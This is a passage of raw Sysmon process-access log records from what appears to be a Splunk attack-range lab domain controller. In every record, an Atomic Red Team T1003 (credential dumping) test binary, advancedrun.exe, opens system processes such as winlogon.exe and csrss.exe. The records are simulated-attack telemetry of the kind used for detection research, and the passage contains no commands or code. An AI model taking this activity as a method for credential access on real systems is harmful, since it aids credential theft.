162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003952239Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952238Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952237Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952236Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952235Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952234Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952233Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952232Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952231Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952230Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952229Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952228Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952227Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952224Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 